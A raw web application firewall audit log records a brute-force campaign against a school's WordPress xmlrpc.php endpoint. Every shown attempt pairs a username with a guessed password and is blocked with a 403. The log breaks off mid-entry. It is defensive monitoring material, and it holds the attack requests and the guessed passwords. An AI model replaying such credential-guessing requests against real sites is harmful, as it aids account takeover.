48164 103.236.140.4 8181 --8776a21b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8776a21b-C-- wp.getUsersBlogs miswan london --8776a21b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8776a21b-E-- --8776a21b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872326166791 4759 (- - -) Stopwatch2: 1749872326166791 4759; combined=3491, p1=388, p2=2934, p3=0, p4=0, p5=99, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8776a21b-Z-- --5a29ee38-A-- [14/Jun/2025:10:39:47 +0700] aEzvA0MWfhkd5Y0sFtrxdAAAAJQ 103.236.140.4 48230 103.236.140.4 8181 --5a29ee38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a29ee38-C-- wp.getUsersBlogs miswan celtic --5a29ee38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a29ee38-E-- --5a29ee38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872387108978 4952 (- - -) Stopwatch2: 1749872387108978 4952; combined=3564, p1=444, p2=2952, p3=0, p4=0, p5=99, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a29ee38-Z-- --074e6f7a-A-- [14/Jun/2025:10:40:47 +0700] aEzvP2mwZ6YUkjOdtI7OWQAAAAo 103.236.140.4 48336 103.236.140.4 8181 --074e6f7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --074e6f7a-C-- wp.getUsersBlogs miswan bethany --074e6f7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --074e6f7a-E-- --074e6f7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872447089273 5359 (- - -) Stopwatch2: 1749872447089273 5359; combined=3799, p1=436, p2=3063, p3=0, p4=0, p5=164, sr=94, sw=136, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --074e6f7a-Z-- --a3f05a17-A-- [14/Jun/2025:10:41:47 +0700] aEzve2mwZ6YUkjOdtI7OjgAAAA8 103.236.140.4 48466 103.236.140.4 8181 --a3f05a17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a3f05a17-C-- wp.getUsersBlogs kresno 1234567890 --a3f05a17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f05a17-E-- --a3f05a17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872507255521 4380 (- - -) Stopwatch2: 1749872507255521 4380; combined=3284, p1=341, p2=2751, p3=0, p4=0, p5=109, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f05a17-Z-- --6dde0440-A-- [14/Jun/2025:10:42:48 +0700] aEzvuF3g_boun6Rx5jLUYwAAANg 103.236.140.4 48542 103.236.140.4 8181 --6dde0440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6dde0440-C-- wp.getUsersBlogs kresno kresno@2015 --6dde0440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dde0440-E-- --6dde0440-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872568166870 4217 (- - -) Stopwatch2: 1749872568166870 4217; combined=3229, p1=374, p2=2674, p3=0, p4=0, p5=104, sr=82, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dde0440-Z-- --ca1e2e0c-A-- [14/Jun/2025:10:44:00 +0700] aEzwAGIDXuKmWNi2UBS6AgAAAEE 103.236.140.4 48566 103.236.140.4 8181 --ca1e2e0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca1e2e0c-C-- wp.getUsersBlogs kresno asdf1234 --ca1e2e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca1e2e0c-E-- --ca1e2e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872640344233 5534 (- - -) Stopwatch2: 1749872640344233 5534; combined=3869, p1=461, p2=3201, p3=0, p4=0, p5=121, sr=93, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca1e2e0c-Z-- --f3d5b548-A-- [14/Jun/2025:10:45:01 +0700] aEzwPV3g_boun6Rx5jLUgQAAAMc 103.236.140.4 48680 103.236.140.4 8181 --f3d5b548-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3d5b548-C-- wp.getUsersBlogs kresno Marketing2011_ --f3d5b548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3d5b548-E-- --f3d5b548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872701333511 5747 (- - -) Stopwatch2: 1749872701333511 5747; combined=3910, p1=505, p2=3220, p3=0, p4=0, p5=109, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3d5b548-Z-- --191b714f-A-- [14/Jun/2025:10:46:01 +0700] aEzweUMWfhkd5Y0sFtrx6AAAAIk 103.236.140.4 48852 103.236.140.4 8181 --191b714f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --191b714f-C-- wp.getUsersBlogs kresno kresno@1987 --191b714f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --191b714f-E-- --191b714f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872761229771 4138 (- - -) Stopwatch2: 1749872761229771 4138; combined=3177, p1=342, p2=2671, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --191b714f-Z-- --002ef650-A-- [14/Jun/2025:10:47:04 +0700] aEzwuEMWfhkd5Y0sFtryDwAAAIM 103.236.140.4 48946 103.236.140.4 8181 --002ef650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --002ef650-C-- wp.getUsersBlogs kresno 123qweasd --002ef650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002ef650-E-- --002ef650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872824656958 5316 (- - -) Stopwatch2: 1749872824656958 5316; combined=3741, p1=502, p2=3068, p3=0, p4=0, p5=100, sr=123, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002ef650-Z-- --1a8ea76d-A-- [14/Jun/2025:10:48:27 +0700] aEzxC0MWfhkd5Y0sFtryGQAAAI8 103.236.140.4 49038 103.236.140.4 8181 --1a8ea76d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1a8ea76d-C-- wp.getUsersBlogs kresno Admin! --1a8ea76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a8ea76d-E-- --1a8ea76d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872907221703 5971 (- - -) Stopwatch2: 1749872907221703 5971; combined=4103, p1=546, p2=3380, p3=0, p4=0, p5=105, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a8ea76d-Z-- --d68f9a08-A-- [14/Jun/2025:10:49:27 +0700] aEzxR13g_boun6Rx5jLUuQAAANU 103.236.140.4 49114 103.236.140.4 8181 --d68f9a08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d68f9a08-C-- wp.getUsersBlogs kresno 123789 --d68f9a08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68f9a08-E-- --d68f9a08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872967705912 4297 (- - -) Stopwatch2: 1749872967705912 4297; combined=3331, p1=375, p2=2790, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68f9a08-Z-- --d6721860-A-- [14/Jun/2025:10:50:27 +0700] aEzxg0MWfhkd5Y0sFtryPQAAAIc 103.236.140.4 49190 103.236.140.4 8181 --d6721860-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6721860-C-- wp.getUsersBlogs kresno adminadmin --d6721860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6721860-E-- --d6721860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873027347070 3749 (- - -) Stopwatch2: 1749873027347070 3749; combined=2884, p1=327, p2=2413, p3=0, p4=0, p5=84, sr=86, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6721860-Z-- --90f6ad6b-A-- [14/Jun/2025:10:51:28 +0700] aEzxwEMWfhkd5Y0sFtryZwAAAIs 103.236.140.4 49288 103.236.140.4 8181 --90f6ad6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --90f6ad6b-C-- wp.getUsersBlogs kresno admin234 --90f6ad6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f6ad6b-E-- --90f6ad6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873088778188 4939 (- - -) Stopwatch2: 1749873088778188 4939; combined=3465, p1=427, p2=2879, p3=0, p4=0, p5=94, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f6ad6b-Z-- --9dae8b40-A-- [14/Jun/2025:10:52:29 +0700] aEzx_UMWfhkd5Y0sFtrytgAAAJM 103.236.140.4 49486 103.236.140.4 8181 --9dae8b40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9dae8b40-C-- wp.getUsersBlogs kresno qweqwe --9dae8b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dae8b40-E-- --9dae8b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873149328181 5996 (- - -) Stopwatch2: 1749873149328181 5996; combined=4082, p1=514, p2=3393, p3=0, p4=0, p5=104, sr=97, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dae8b40-Z-- --eced426c-A-- [14/Jun/2025:10:53:39 +0700] aEzyQ0MWfhkd5Y0sFtry3wAAAJA 103.236.140.4 49576 103.236.140.4 8181 --eced426c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eced426c-C-- wp.getUsersBlogs kresno rockyou --eced426c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eced426c-E-- --eced426c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873219894669 5571 (- - -) Stopwatch2: 1749873219894669 5571; combined=3931, p1=520, p2=3238, p3=0, p4=0, p5=102, sr=107, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eced426c-Z-- --5d42c244-A-- [14/Jun/2025:10:54:15 +0700] aEzyZ0MWfhkd5Y0sFtry9gAAAJI 103.236.140.4 49630 103.236.140.4 8181 --5d42c244-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d42c244-C-- wp.getUsersBlogs kresno 1234%^&* --5d42c244-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d42c244-E-- --5d42c244-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: 